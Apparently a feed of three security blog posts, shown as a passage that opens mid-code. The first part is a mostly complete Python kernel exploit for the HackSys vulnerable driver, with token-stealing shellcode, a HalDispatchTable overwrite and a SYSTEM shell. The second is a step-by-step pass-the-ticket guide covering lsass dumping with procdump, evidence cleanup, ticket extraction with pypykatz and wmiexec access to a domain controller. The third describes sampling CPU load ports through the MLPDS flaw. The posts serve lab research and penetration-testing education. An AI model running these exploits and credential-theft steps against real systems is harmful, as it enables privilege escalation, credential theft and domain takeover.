    "\xba\x04\x00\x00\x00"            # mov edx,0x4
    "\x8b\x80\xb8\x00\x00\x00"        # mov eax,[eax+0xb8]
    "\x2d\xb8\x00\x00\x00"            # sub eax,0xb8
    "\x39\x90\xb4\x00\x00\x00"        # cmp [eax+0xb4],edx
    "\x75\xed"                        # jnz 0x1a
    "\x8b\x90\xf8\x00\x00\x00"        # mov edx,[eax+0xf8]
    "\x89\x91\xf8\x00\x00\x00"        # mov [ecx+0xf8],edx
    "\x61"                            # popad
    "\x31\xc0"                        # xor eax, eax (restore execution)
    "\x83\xc4\x24"                    # add esp, 0x24 (restore execution)
    "\x5d"                            # pop ebp
    "\xc2\x08\x00"                    # ret 0x8
)

# Defeating DEP with VirtualAlloc. Creating RWX memory, and copying our shellcode in that region.
print "[+] Allocating RWX region for shellcode"
ptr = kernel32.VirtualAlloc(
    c_int(0),                         # lpAddress
    c_int(len(payload)),              # dwSize
    c_int(0x3000),                    # flAllocationType
    c_int(0x40)                       # flProtect
)

# Creates a ctype variant of the payload (from_buffer)
c_type_buffer = (c_char * len(payload)).from_buffer(payload)

print "[+] Copying shellcode to newly allocated RWX region"
kernel32.RtlMoveMemory(
    c_int(ptr),                       # Destination (pointer)
    c_type_buffer,                    # Source (pointer)
    c_int(len(payload))               # Length
)

# Python, when using id to return a value, creates an offset of 20 bytes ot the value (first bytes reference variable)
# After id returns the value, it is then necessary to increase the returned value 20 bytes
payload_address = id(payload) + 20
payload_updated = struct.pack("<L", ptr)
payload_final = id(payload_updated) + 20

# Location of shellcode update statement
print "[+] Location of shellcode: {0}".format(hex(payload_address))

# Location of pointer to shellcode
print "[+] Location of pointer to shellcode: {0}".format(hex(payload_final))

# The goal is to eventually locate HAL table.
# HAL is exported by ntoskrnl.exe
# ntoskrnl.exe's location can be enumerated via EnumDeviceDrivers() and GetDEviceDriverBaseNameA() functions via Windows API.

# Enumerating addresses for all drivers via EnumDeviceDrivers()
base = (c_ulong * 1024)()
get_drivers = psapi.EnumDeviceDrivers(
    byref(base),                      # lpImageBase (array that receives list of addresses)
    c_int(1024),                      # cb (size of lpImageBase array, in bytes)
    byref(c_long())                   # lpcbNeeded (bytes returned in the array)
)

# Error handling if function fails
if not base:
    print "[+] EnumDeviceDrivers() function call failed!"
    sys.exit(-1)

# Cycle through enumerated addresses, for ntoskrnl.exe using GetDeviceDriverBaseNameA()
for base_address in base:
    if not base_address:
        continue
    current_name = c_char_p('\x00' * 1024)
    driver_name = psapi.GetDeviceDriverBaseNameA(
        base_address,                 # ImageBase (load address of current device driver)
        current_name,                 # lpFilename
        48                            # nSize (size of the buffer, in chars)
    )

    # Error handling if function fails
    if not driver_name:
        print "[+] GetDeviceDriverBaseNameA() function call failed!"
        sys.exit(-1)

    if current_name.value.lower() == 'ntkrnl' or 'ntkrnl' in current_name.value.lower():

        # When ntoskrnl.exe is found, return the value at the time of being found
        current_name = current_name.value

        # Print update to show address of ntoskrnl.exe
        print "[+] Found address of ntoskrnl.exe at: {0}".format(hex(base_address))

        # It assumed the information needed from the for loop has been found if the program has reached execution at this point.
        # Stopping the for loop to move on.
        break
    
# Now that all of the proper information to reference HAL has been enumerated, it is time to get the location of HAL and HAL 0x4
# NtQueryIntervalProfile is an undocumented Windows API function that references HAL at the location of HAL +0x4.
# HAL +0x4 is the address we will eventually need to write over. Once HAL is exported, we will be most interested in HAL + 0x4

# Beginning enumeration
kernel_handle = kernel32.LoadLibraryExA(
    current_name,                       # lpLibFileName (specifies the name of the module, in this case ntlkrnl.exe)
    None,                               # hFile (parameter must be null
    0x00000001                          # dwFlags (DONT_RESOLVE_DLL_REFERENCES)
)

# Error handling if function fails
if not kernel_handle:
    print "[+] LoadLibraryExA() function failed!"
    sys.exit(-1)

# Getting HAL Address
hal = kernel32.GetProcAddress(
    kernel_handle,                      # hModule (handle passed via LoadLibraryExA to ntoskrnl.exe)
    'HalDispatchTable'                  # lpProcName (name of value)
)

# Subtracting ntoskrnl base in user mode
hal -= kernel_handle

# Add base address of ntoskrnl in kernel mode
hal += base_address

# Recall earlier we were more interested in HAL + 0x4. Let's grab that address.
real_hal = hal + 0x4

# Print update with HAL and HAL + 0x4 location
print "[+] HAL location: {0}".format(hex(hal))
print "[+] HAL + 0x4 location: {0}".format(hex(real_hal))

# Referencing class created at the beginning of the sploit and passing shellcode to vulnerable pointers
# This is where the exploit occurs
write_what_where = WriteWhatWhere()
write_what_where.What = payload_final   # What we are writing (our shellcode)
write_what_where.Where = real_hal       # Where we are writing it to (HAL + 0x4). NtQueryIntervalProfile() will eventually call this location and execute it
write_what_where_pointer = pointer(write_what_where)

# Print update statement to reflect said exploit
print "[+] What: {0}".format(hex(write_what_where.What))
print "[+] Where: {0}".format(hex(write_what_where.Where))


# Getting handle to driver to return to DeviceIoControl() function
print "[+] Using CreateFileA() to obtain and return handle referencing the driver..."
handle = kernel32.CreateFileA(
    "\\\\.\\HackSysExtremeVulnerableDriver", # lpFileName
    0xC0000000,                         # dwDesiredAccess
    0,                                  # dwShareMode
    None,                               # lpSecurityAttributes
    0x3,                                # dwCreationDisposition
    0,                                  # dwFlagsAndAttributes
    None                                # hTemplateFile
)

# 0x002200B = IOCTL code that will jump to TriggerArbitraryOverwrite() function
kernel32.DeviceIoControl(
    handle,                             # hDevice
    0x0022200B,                         # dwIoControlCode
    write_what_where_pointer,           # lpInBuffer
    0x8,                                # nInBufferSize
    None,                               # lpOutBuffer
    0,                                  # nOutBufferSize
    byref(c_ulong()),                   # lpBytesReturned
    None                                # lpOverlapped
)
    
# Actually calling NtQueryIntervalProfile function, which will call HAL + 0x4, where our shellcode will be waiting.
ntdll.NtQueryIntervalProfile(
    0x1234,
    byref(c_ulong())
)

# Print update for nt_autority\system shell
print "[+] Enjoy the NT AUTHORITY\SYSTEM shell!!!!"
Popen("start cmd", shell=True)

There is a lot to digest here. Let’s look at the following:

# Referencing class created at the beginning of the sploit and passing shellcode to vulnerable pointers
# This is where the exploit occurs
write_what_where = WriteWhatWhere()
write_what_where.What = payload_final   # What we are writing (our shellcode)
write_what_where.Where = real_hal       # Where we are writing it to (HAL + 0x4). NtQueryIntervalProfile() will eventually call this location and execute it
write_what_where_pointer = pointer(write_what_where)

# Print update statement to reflect said exploit
print "[+] What: {0}".format(hex(write_what_where.What))
print "[+] Where: {0}".format(hex(write_what_where.Where))

Here, is where the What and Where come into play. We create a variable called write_what_where and we call the What pointer from the class created called WriteWhatWhere(). That value gets set to equal the address of a pointer to our shellcode. The same thing happens with Where, but it receives the value of HalDispatchTable + 0x4. And in the end, a pointer to the variable write_what_where, which has inherited all of our useful information about our pointer to the shellcode and HalDispatchTable + 0x4, is passed in the DeviceIoControl() function, which actually interacts with the driver.

One last thing. Take a peak here:

# Actually calling NtQueryIntervalProfile function, which will call HAL + 0x4, where our shellcode will be waiting.
ntdll.NtQueryIntervalProfile(
    0x1234,
    byref(c_ulong())
)

The whole reason this exploit works in the first place, is because after everything is in place, we call NtQueryIntervalProfile(). Although this function never receives any of our parameters, pointers, or variables- it does not matter. Our shellcode will be located at HalDispatchTable + 0x4 BEFORE the call to NtQueryIntervalProfile(). Calling NtQueryIntervalProfile() ensures that location of HalDispatchTable + 0x4 (because NtQueryIntervalProfile() calls KeQueryIntervalProfile(), which calls HalDispatchTable + 0x4) gets executed. And then just like that- our payload will be executed!

All Together Now

Final execution of the exploit- and we have an administrative shell!! Pwn all of the things!

Wrapping Up

Thanks again to the HackSysExtreme team for their vulnerable driver, and other fellow security researchers like rootkit for their research! As I keep going down the kernel route, I hope to be making it over to x64 here in the near future! Please contact me with any questions, comments, or corrections!

Peace, love, and positivity! :-)

Practical Guide to Passing Kerberos Tickets From Linux

21 November 2019 at 14:00

This goal of this post is to be a practical guide to passing Kerberos tickets from a Linux host. In general, penetration testers are very familiar with using Mimikatz to obtain cleartext passwords or NT hashes and utilize them for lateral movement. At times we may find ourselves in a situation where we have local admin access to a host, but are unable to obtain either a cleartext password or NT hash of a target user. Fear not, in many cases we can simply pass a Kerberos ticket in place of passing a hash.

This post is meant to be a practical guide. For a deeper understanding of the technical details and theory see the resources at the end of the post.

Tools

To get started we will first need to setup some tools. All have information on how to setup on their GitHub page.

Impacket

https://github.com/SecureAuthCorp/impacket

pypykatz

https://github.com/skelsec/pypykatz

Kerberos Client (optional)

RPM based: yum install krb5-workstation
Debian based: apt install krb5-user

procdump

https://docs.microsoft.com/en-us/sysinternals/downloads/procdump

autoProc.py (not required, but useful)

wget https://gist.githubusercontent.com/knavesec/0bf192d600ee15f214560ad6280df556/raw/36ff756346ebfc7f9721af8c18dff7d2aaf005ce/autoProc.py

Lab Environment

This guide will use a simple Windows lab with two hosts:

dc01.winlab.com (domain controller)
client01.winlab.com (generic server

And two domain accounts:

Administrator (domain admin)
User1 (local admin to client01)

Passing the Ticket

By some prior means we have compromised the account user1, which has local admin access to client01.winlab.com.

image 1

A standard technique from this position would be to dump passwords and NT hashes with Mimikatz. Instead, we will use a slightly different technique of dumping the memory of the lsass.exe process with procdump64.exe from Sysinternals. This has the advantage of avoiding antivirus without needing a modified version of Mimikatz.

This can be done by uploading procdump64.exe to the target host:

image 2

And then run:

procdump64.exe -accepteula -ma lsass.exe output-file

image 3

Alternatively we can use autoProc.py which automates all of this as well as cleans up the evidence (if using this method make sure you have placed procdump64.exe in /opt/procdump/. I also prefer to comment out line 107):

python3 autoProc.py domain/user@target

image 4

We now have the lsass.dmp on our attacking host. Next we dump the Kerberos tickets:

pypykatz lsa -k /kerberos/output/dir minidump lsass.dmp

image 5

And view the available tickets:

image 6

Ideally, we want a krbtgt ticket. A krbtgt ticket allows us to access any service that the account has privileges to. Otherwise we are limited to the specific service of the TGS ticket. In this case we have a krbtgt ticket for the Administrator account!

The next step is to convert the ticket from .kirbi to .ccache so that we can use it on our Linux host:

kirbi2ccache input.kirbi output.ccache

image 7

Now that the ticket file is in the correct format, we specify the location of the .ccache file by setting the KRB5CCNAME environment variable and use klist to verify everything looks correct (if optional Kerberos client was installed, klist is just used as a sanity check):

export KRB5CCNAME=/path/to/.ccache
klist

image 8

We must specify the target host by the fully qualified domain name. We can either add the host to our /etc/hosts file or point to the DNS server of the Windows environment. Finally, we are ready to use the ticket to gain access to the domain controller:

wmiexec.py -no-pass -k -dc-ip w.x.y.z domain/user@fqdn

image 9

Excellent! We were able to elevate to domain admin by using pass the ticket! Be aware that Kerberos tickets have a set lifetime. Make full use of the ticket before it expires!

Conclusion

Passing the ticket can be a very effective technique when you do not have access to an NT hash or password. Blue teams are increasingly aware of passing the hash. In response they are placing high value accounts in the Protected Users group or taking other defensive measures. As such, passing the ticket is becoming more and more relevant.

Resources

https://www.tarlogic.com/en/blog/how-kerberos-works/

https://www.harmj0y.net/blog/tag/kerberos/

Thanks to the following for providing tools or knowledge:

Impacket

gentilkiwi

harmj0y

SkelSec

knavesec

CPU Introspection: Intel Load Port Snooping

30 December 2019 at 04:11

Load sequence example

Frequencies of observed values over time from load ports. Here we’re seeing the processor internally performing a microcode-assisted page table walk to update accessed and dirty bits. Only one load was performed by the user, these are all “invisible” loads done behind the scenes

Twitter

Follow me at @gamozolabs on Twitter if you want notifications when new blogs come up. I often will post data and graphs from data as it comes in and I learn!


Foreward

First of all, I’d like to say that I’m super excited to write up this blog. This is an idea I’ve had for over a year and I only recently got to working on. The initial implementation and proof-of-concept of this idea was actually implemented live on my Twitch! This proof-of-concept went from nothing at all to a fully-working-as-predicted implementation in just about 3 hours! Not only did the implementation go much smoother than expected, the results are by far higher resolution and signal-to-noise than I expected!

This blog is fairly technical, and thus I highly recommend that you read my previous blog on Sushi Roll, my CPU research kernel where this technique was implemented. In the Sushi Roll blog I go a little bit more into the high-level details of Intel micro-architecture and it’s a great introduction to the topic if you’re not familiar.

YouTube video for PoC
implementation

Recording of the stream where we implemented this idea as a proof-of-concept. Click for the YouTube video!


Summary

We’re going to go into a unique technique for observing and sequencing all load port traffic on Intel processors. By using a CPU vulnerability from the MDS set of vulnerabilities, specifically multi-architectural load port data sampling (MLPDS, CVE-2018-12127), we are able to observe values which fly by on the load ports. Since (to my knowledge) all loads must end up going through load ports, regardless of requestor, origin, or caching, this means in theory, all contents of loads ever performed can be observed. By using a creative scanning technique we’re able to not only view “random” loads as they go by, but sequence loads to determine the ordering and timing of them.

We’ll go through some examples demonstrating that this technique can be used to view all loads as they are performed on a cycle-by-cycle basis. We’ll look into an interesting case of the micro-architecture updating accessed and dirty bits using a microcode assist. These are invisible loads dispatched on the CPU on behalf of the user when a page is accessed for the first time.

Why

As you may be familiar, x86 is quite a complex architecture with many nooks and crannies. As time has passed it has only gotten more complex, leading to fewer known behaviors of the inner workings. There are many instructions with complex microcode invocations which access memory as were seen through my work on Sushi Roll. This led to me being curious as to what is actually going on with load ports during some of these operations.

Intel CPU traffic during a normal
write

Intel CPU traffic on load ports (ports 2 and 3) and store ports (port 4) during a traditional memory write

Intel CPU traffic during a write requiring dirty/accessed
updates

Intel CPU traffic on load ports (ports 2 and 3) and store ports (port 4) during the same memory write as above, but this time where the page table entries need an accessed/dirty bit update

Beyond just directly invoked microcode due to instructions being executed, microcode also gets executed on the processor during “microcode assists”. These operations, while often undocumented, are referenced a few times throughout Intel manuals. Specifically in the Intel Optimization Manual there are references to microcode assists during accessed and dirty bit updates. Further, there is a restriction on TSX sections such that they may abort when accessed and dirty bits need to be updated. These microcode assists are fascinating to me, as while I have no evidence for it, I suspect they may be subject to different levels of permissions and validations compared to traditional operations. Whenever I see code executing on a processor as a side-effect to user operations, all I think is: “here be dragons”.


A playground for CPU bugs

When I start auditing a target, the first thing that I try to do is get introspection into what is going on. If the target is an obscure device then I’ll likely try to find some bug that allows me to image the entire device, and load it up in an emulator. If it’s some source code I have that is partial, then I’ll try to get some sort of mocking of the external calls it’s making and implement them as I come by them. Once I have the target running on my terms, and not the terms of some locked down device or environment, then I’ll start trying to learn as much about it as possible…

This is no different from what I did when I got into CPU research. Starting with when Meltdown and Spectre came out I started to be the go-to person for writing PoCs for CPU bugs. I developed a few custom OSes early on that were just designed to give a pass/fail indicator if a CPU bug were able to be exploited in a given environment. This was critical in helping test the mitigations that went in place for each CPU bug as they were reported, as testing if these mitigations worked is a surprisingly hard problem.

This led to me having some cleanly made OS-level CPU exploits written up. The custom OS proved to be a great way to test the mitigations, especially as the signal was much higher compared to a traditional OS. In fact, the signal was almost just a bit too strong…

When in a custom operating system it’s a lot easier to play around with weird behaviors of the CPU, without worrying about it affecting the system’s stability. I can easily turn off interrupts, overwrite exception handlers with specialized ones, change MSRs to weird CPU states, and so on. This led to me ending up with almost a playground for CPU vulnerability testing with some pretty standard primitives.

As the number of primitives I had grew, I was able to PoC out a new CPU bug in typically under a day. But then I had to wonder… what would happen if I tried to get the most information out of the processor as possible.


Sushi Roll

And that was the starting of Sushi Roll, my CPU research kernel. I have a whole blog about the Sushi Roll research kernel, and I strongly recommend you read it! Effectively Sushi Roll is a custom kernel with message passing between cores rather than memory sharing. This means that each core has a complete copy of the kernel with no shared accesses. For attacks which need to observe the faintest signal in memory behaviors, this lead to a great amount of isolation.

When looking for a behavior you already understand on a processor, it’s pretty easy to get a signal. But, when doing initial CPU research into the unknowns and undefined behavior, getting this signal out takes every advantage as you can get. Thus in this low-noise CPU research environment, even the faintest leak would cause a pretty large disruption in determinism, which would likely show up as a measurable result earlier than traditional blind CPU research would allow.

Performance Counter Monitoring

In Sushi Roll I implemented a creative technique for monitoring the values in performance counters along with time-stamping them in cycles. Some of the performance counters in Intel processors count things like the number of micro-ops dispatched to each of the execution units on the core. Some of these counters increase during speculation, and with this data and time-stamping I was able to get some of the first-ever insights into what processor behavior was actually occurring during speculation!

Example uarch activity Example cycle-by-cycle profiling of the Kaby Lake micro-architecture, warning: log-scale y-axis

Being able to collect this sort of data immediately made unexpected CPU behaviors easier to catalog, measure, and eventually make determinstic. The more understanding we can get of the internals of the CPU, the better!


The Ultimate Goal

The ultimate goal of my CPU research is to understand so thoroughly how the Intel micro-architecture works that I can predict it with emulation models. This means that I would like to run code through an emulated environment and it would tell me exactly how many internal CPU resources would be used, which lines from caches and buffers would be evicted and what contents they would hold. There’s something beautiful to me to understanding something so well that you can predict how it will behave. And so the journey begins…

Past Progress

So far with the work in Sushi Roll we’ve been able to observe how the CPU dispatches uops during specific portions of code. This allows us to see which CPU resources are used to fulfill certain requests, and thus can provide us with a rough outline of what is happening. With simple CPU operations this is often all we need, as there are only so many ways to perform a certain operation, the complete picture can usually be drawn just from guessing “how they might have done it”. However, when more complex operations are involved, all of that goes out the window.

When reading through Intel manuals I saw many references to microcode assists. These are “situations” in your processor which may require microcode to be dispatched to execution units to perform some complex-ish logic. These are typically edge cases which don’t occur frequently enough for the processor to worry about handling them in hardware, rather just needing to detect them and cause some assist code to run. We know of one microcode assist which is relatively easy to trigger, updating the accessed and dirty bits in the page tables.

Accessed and dirty bits

In the Intel page table (and honestly most other architectures) there’s a concept of accessed and dirty bits. These bits indicate whether or not a page has ever been translated (accessed), or if it has been written to (dirtied). On Intel it’s a little strange as there is only a dirty bit on the final page table entry. However, the accessed bits are present on each level of the page table during the walk. I’m quite familiar with these bits from my work with hypervisor-based fuzzing as it allows high performance differential resetting of VMs by simply walking the page tables and restoring pages that were dirtied to their original state of a snapshot.

But this leads to an curiosity… what is the mechanic responsible for setting these bits? Does the internal page table silicon set these during a page table walk? Are they set after the fact? Are they atomically set? Are they set during speculation or faulting loads?

From Intel manuals and some restrictions with TSX it’s pretty obvious that accessed and dirty bits are a bit of an anomaly. TSX regions will abort when memory is touched that does not have the respective accessed or dirty bits set. Which is strange, why would this be a limitation of the processor?

TSX aborts during accessed and dirty bit
updates

Accessed and dirty bits causing TSX aborts from the Intel® 64 and IA-32 architectures optimization reference manual

… weird huh? Testing it out yields exactly what the manual says. If I write up some sample code which accesses memory which doesn’t have the respective accessed or dirty bits set, it aborts every time!

What’s next?

So now we have an ability to view what operation types are being performed on the processor. However this doesn’t tell us a huge amount of information. What we would really benefit from would be knowing the data contents that are being operated on. We can pretty easily log the data we are fetching in our own code, but that won’t give us access to the internal loads that happen as side effects on the processor, nor would it tell us about the contents of loads which happen during speculation.

Surely there’s no way to view all loads which happen on the processor right? Almost anything during speculation is a pain to observe, and even if we could observe the data it’d be quite noisy.

Or maybe there is a way…

… a way?

Fortunately there may indeed be a way! A while back I found a CPU vulnerability which allowed for random values to be sampled off of the load ports. While this vulnerability is initially thought to only allow for random values to be sampled from the load ports, perhaps we can get a bit more creative about leaking…


Multi-Architectural Load Port Data Sampling (MLPDS)

Multi-architectural load port data sampling sounds like an overly complex name, but it’s actually quite simple in the end. It’s a set of CPU flaws in Intel processors which allow a user to potentially get access to stale data recently transferred through load ports. This was actually a bug that I reported to Intel a while back and they ended up finding a few similar issues with different instruction combinations, this is ultimately what comprises MLPDS.

MLPDS Intel Description

Description of MLPDS from Intel’s MDS DeepDive

The specific bug that I found was initially called “cache line split” or “cache line split load” and it’s exactly what you might expect. When a data access straddles a cache line (multi-byte load containing some bytes on one cache line and the remaining bytes on another). Cache lines are 64-bytes in size so any multi-byte memory access to an address with the bottom 6 bits set would cause this behavior. These accesses must also cause a fault or an assist, but by using TSX it’s pretty easy to get whatever behavior you would like.

This bug is largely an issue when hyper-threading is enabled as this allows a sibling thread to be executing protected/privileged code while another thread uses this attack to observe recently loaded data.

I found this bug when working on early PoCs of L1TF when we were assessing the impact it had. In my L1TF PoC (which was using random virtual addresses each attempt) I ended up disabling the page table modification. This ultimately is the root requirement for L1TF to work, and to my surprise, I was still seeing a signal. I initially thought it was some sort of CPU bug leaking registers as the value I was leaking was never actually read in my code. It turns out what I ended up observing was the hypervisor itself context switching my VM. What I was leaking was the contents of the registers as they were loaded during the context switch!

Unfortunately MLPDS has a really complex PoC…

mov rax, [-1]

After this instruction executes and it faults or aborts, the contents of rax during a small speculative window will potentially contain stale data from load ports. That’s all it takes!

From this point it’s just some trickery to get the 64-bit value leaked during the speculative window!


It’s all too random

Okay, so MLPDS allows us to sample a “random” value which was recently loaded on the load ports. This is a great start as we could probably run this attack over and over and see what data is observed on a sample piece of code. Using hyper-threading for this attack will be ideal because we can have one thread running some sample code in an infinite loop, while the other code observes the values seen on the load port.

An MLPDS exploit

Since there isn’t yet a public exploit for MLPDS, especially with the data rates we’re going to use here, I’m just going to go over the high-level details and not show how it’s implemented under the hood.

For this MLPDS exploit I use a couple different primitives. One is a pretty basic exploit which simply attempts to leak the raw contents of the value which was leaked. This value that we leak is always 64-bits, but we can chose to only leak a few of the bytes from it (or even bit-level granularity). There’s a performance increase for the fewer bytes that we leak as it decreases the number of cache lines we need to prime-and-probe each attempt.

There’s also another exploit type that I use that allows me to look for a specific value in memory, which turns the leak from a multi-byte leak to just a boolean “was value/wasn’t value”. This is the highest performance version due to how little information has to be leaked past the speculative window.

All of these leaks will leak a specific value from a single speculative run. For example if we were to leak a 64-bit value, the 64-bit value will be from one MLPDS exploit and one speculative window. Getting an entire 64-bit value out during a single speculative window is a surprisingly hard problem, and I’m going to keep that as my own special sauce for a while. Compared to many public CPU leak exploits, this attack does not loop multiple times using masks to slowly reveal a value, it will get revealed from a single attempt. This is critical to us as otherwise we wouldn’t be able to observe values which are loaded once.

Here’s some of the leak rate numbers for the current version of MLPDS that I’m using:

Leak type Leaks/second
Known 64-bit value 5,979,278
8-bit any value 228,479
16-bit any value 116,023
24-bit any value 25,175
32-bit any value 13,726
40-bit any value 12,713
48-bit any value 10,297
56-bit any value 9,521
64-bit any value 8,234

It’s important to note that the known 64-bit value search is much faster than all of the others. We’ll make some good use of this later!

Test

Let’s try out a simple MLPDS attack on a small piece of code which loops forever fetching 2 values from memory.

mov  rax, 0x12345678f00dfeed
mov [0x1000], rax

mov  rax, 0x1337133713371337
mov [0x1008], rax

2:
    mov rax, [0x1000]
    mov rax, [0x1008]
    jmp 2b

This code should in theory just causes two loads. One of a value 0x12345678f00dfeed and another of a value 0x1337133713371337. Lets spin this up on a hardware thread and have the sibling thread perform MLPDS in a loop! We’ll use our 64-bit any value MLPDS attack and just histogram all of the different values we observe get leaked.

Sampling done:
    0x12345678f00dfeed : 100532
    0x1337133713371337 : 99217

Viola! Here we see the two different secret values on the attacking thread, at a pretty much comparable frequency.

Cool… so now we have a technique that will allow us to see the contents of all loads on load ports, but randomly sampled only. Let’s take a look at the weird behaviors during accessed bit updates by clearing the accessed bit on the final level page tables every loop in the same code above.

Sampling done:
    0x0000000000000008 : 559
    0x0000000000000009 : 2316
    0x000000000000000a : 142
    0x000000000000000e : 251
    0x0000000000000010 : 825
    0x0000000000000100 : 19
    0x0000000000000200 : 3
    0x0000000000010006 : 438
    0x000000002cc8c000 : 3796
    0x000000002cc8c027 : 225
    0x000000002cc8d000 : 112
    0x000000002cc8d027 : 57
    0x000000002cc8e000 : 1
    0x000000002cc8e027 : 35
    0x00000000ffff8bc2 : 302
    0x00002da0ea6a5b78 : 1456
    0x00002da0ea6a5ba0 : 2034
    0x0000700dfeed0000 : 246
    0x0000700dfeed0008 : 5081
    0x0000930000000000 : 4097
    0x00209b0000000000 : 15101
    0x1337133713371337 : 2028
    0xfc91ee000008b7a6 : 677
    0xffff8bc2fc91b7c4 : 2658
    0xffff8bc2fc9209ed : 4565
    0xffff8bc2fc934019 : 2

Whoa! That’s a lot more values than we saw before. They weren’t from just the two values we’re loading in a loop, to many other values. Strangely the 0x1234... value is missing as well. Interesting. Well since we know these are accessed bit updates, perhaps some of these are entries from the page table walk. Let’s look at the addresses of the page table entry we’re hitting.

CR3   0x630000
PML4E 0x2cc8e007
PDPE  0x2cc8d007
PDE   0x2cc8c007
PTE   0x13370003

Oh! How cool is that!? In the loads we’re leaking we see the raw page table entries with various versions of the accessed and dirty bits set! Here are the loads which stand out to me:

Leaked values:

    0x000000002cc8c000 : 3796                                                   
    0x000000002cc8c027 : 225                                                    
    0x000000002cc8d000 : 112                                                    
    0x000000002cc8d027 : 57                                                     
    0x000000002cc8e000 : 1                                                      
    0x000000002cc8e027 : 35 

Actual page table entries for the page we're accessing:

CR3   0x630000                                                                  
PML4E 0x2cc8e007                                                                
PDPE  0x2cc8d007                                                                
PDE   0x2cc8c007                                                                
PTE   0x13370003

The entries are being observed as 0x...27 as the 0x20 bit is the accessed bit for page table entries.

Other notable entries are 0x0000930000000000 and 0x00209b0000000000 which look like the GDT entries for the code and data segments. 0x0000700dfeed0000 and 0x0000700dfeed0008 which are the 2 virtual addresses I’m accessing the un-accessed memory from. Who knows about the rest of the values? Probably some stack addresses in there…

So clearly as we expected, the processor is dispatching uops which are performing a page table walk. Sadly we have no idea what the order of this walk is, maybe we can find a creative technique for sequencing these loads…


Sequencing the Loads

Sequencing the loads that we are leaking with MLPDS is going to be critical to getting meaningful information. Without knowing the ordering of the loads we simply know contents of loads. Which is a pretty awesome amount of information, I’m definitely not complaining… but come on, it’s not perfect!

But perhaps we can limit the timing of our attack to a specific window, and infer ordering based on that. If we can find some trigger point where we can synchronize time between the attacker thread and the thread with secrets, we could change the delay between this synchronization and the leak attempt. By scanning this leak we should hopefully get to see a cycle-by-cycle view of observed values.

A trigger point

We can perform an MLPDS attack on a delay, however we need a reference point to delay from. I’ll steal the oscilloscope terminology of a trigger, or a reference location to synchronize with. Similar to an oscilloscope this trigger will synchronize our on the time domain each time we attempt.

The easiest trigger we can use works only in an environment where we control both the leaking and secret threads, but in our case we have that control.

What we can do is simply have semaphores at each stage of the leak. We’ll have 2 hardware threads running with the following logic:

  1. (Thread A running) (Thread B paused)
  2. (Thread A) Prepare to do a CPU attack, request thread B execute code
  3. (Thread A) Delay for a fixed amount of cycles with a spin loop
  4. (Thread B) Execute sample code
  5. (Thread A) At some “random” point during Thread B executing sample code, perform MLPDS attack to leak a value
  6. (Thread B) Complete sample code execution, wait for thread A to request another execution
  7. (Thread A) Log the observed value and the number of cycles in the delay loop
  8. goto 0 and do this many times until significant data is collected

Uncontrolled target code

If needed a trigger could be set on a “known value” at some point during execution if target code is not controllable. For example, if you’re attacking a kernel, you could identify a magic value or known user pointer which gets accessed close to the code under test. An MLPDS attack can be performed until this magic value is seen, then a delay can start, and another attack can be used to leak a value. This allows an uncontrolled target code to be sampled in a similar way. If the trigger “misses” it’s fine, just try again in another loop.

Did it work?

So we put all of these things together, but does it actually work? Lets try our 2 load example, and we’ll make sure they depend on each other to ensure they don’t get re-ordered by the processor.

Prep code:

core::ptr::write_volatile(vaddr as *mut u64, 0x12341337cafefeed);              
core::ptr::write_volatile((vaddr as *mut u64).offset(1), 0x1337133713371337);  

Test code:

let ptr = core::ptr::read_volatile(vaddr as *mut usize);
core::ptr::read_volatile((vaddr as usize + (ptr & 0x8)) as *mut usize);

In this code we set up 2 dependant loads. One which reads a value, and then another which masks the value to get the 8th bit, which is used as an offset to a subsequent access. Since the values are constants, we know that the second access will always access at offset 8, thus we expect to see a load of 0x1234... followed by 0x1337....

Graphing the data

To graph the data we have collected, we want to collect the frequencies each value was seen for every cycle offset. We’ll plot these with an x axis in cycles, and a y axis in frequency the value was observed at that cycle count. Then we’ll overlay multiple graphs for the different values we’ve seen. Let’s check it out in our simple case test code!

Sequenced leak example data Sequenced leak example data

Here we also introduce a normal distribution best-fit for each value type, and a vertical line through the mean frequency-weighted value.

And look at that! We see the first access (in light blue) indicating that the value 0x12341337cafefeed was read, and slightly after we see (in orange) the value 0x1337133713371337 was read! Exactly what we would have expected. How cool is that!? There’s some other noise on here from the testing harness, but they’re pretty easy to ignore in this case.


A real-data case

Let’s put it all together and take a look at what a load looks like on pages which have not yet been marked as accessed.

Load sequence example

Frequencies of observed values over time from load ports. Here we’re seeing the processor internally performing a microcode-assisted page table walk to update accessed and dirty bits. Only one load was performed by the user, these are all “invisible” loads done behind the scenes

Hmmm, this is a bit too noisy. Let’s re-collect the data but this time only look at the page table entry values and the value contained on the page we’re accessing.

Here are the page table entries for the memory we’re accessing in our example:

CR3   0x630000
PML4E 0x2cc7c007
PDPE  0x2cc7b007
PDE   0x2cc7a007
PTE   0x13370003
Data  0x12341337cafefeed

We’re going to reset all page table entries to their non-dirty, non-accessed states, invalidate the TLB for the page via invlpg, and then read from the memory once. This will cause all accessed bits to be updated in the page tables! Here’s what we get…

Annotated ucode page walk Annotated ucode-assist page walk as observed with this technique

Here it’s hard to say why we see the 3rd and 4th levels of the page table get hit, as well as the page contents, prior to the accessed bit updates. Perhaps the processor tries the access first, and when it realizes the accessed bits are not set it goes through and sets them all. We can see fairly clearly that after this page data is read ~300 cycles in, that it performs a page-by-page walk through each level. Presumably this is where the processor is reading the original values from pages, oring in the accessed bit, and moving to the next level!


Speeding it up

So far using our 64-bit MLPDS leak we can get about 8,000 leaks per second. This is a decent data rate, but when we’re wanting to sample data and draw statistical significance, more is always better. For each different value we want to log, and for each cycle count, we likely want about ~100 points of data. So lets assume we want to sample 10 values over a 1000 cycle range, and we’ll likely want 1 million data points. This means we’ll need about 2 minutes worth of runtime to collect this data.

Luckily, there’s a relatively simple technique we can use to speed up the data rates. Instead of using the full arbitrary 64-bit leak for the whole test, we can use the arbitrary leak early on to determine the values of interest. We just want to use the arbitrary leak for long enough to determine the values which we know are accessed during our test case.

Once we know the values we actually want to leak, we can switch to using our known-value leak which allows for about 6 million leaks per second. Since this can only look for one value at a time, we’ll also have to cycle through the values in our “known value” list, but the speedup is still worth it until the known value list gets incredibly large.

With this technique, collecting the 1 million data points for something with 5-6 values to sample only takes about a second. A speedup of two orders of magnitude! This is the technique that I’m currently using, although I have a fallback to arbitrary value mode if needed for some future use.


Conclusion

We introduced an interesting technique for monitoring Intel load port traffic cycle-by-cycle and demonstrated that it can be used to get meaningful data to learn how Intel micro-architecture works. While there is much more for us to poke around in, this was a simple example to show this technique!

Future

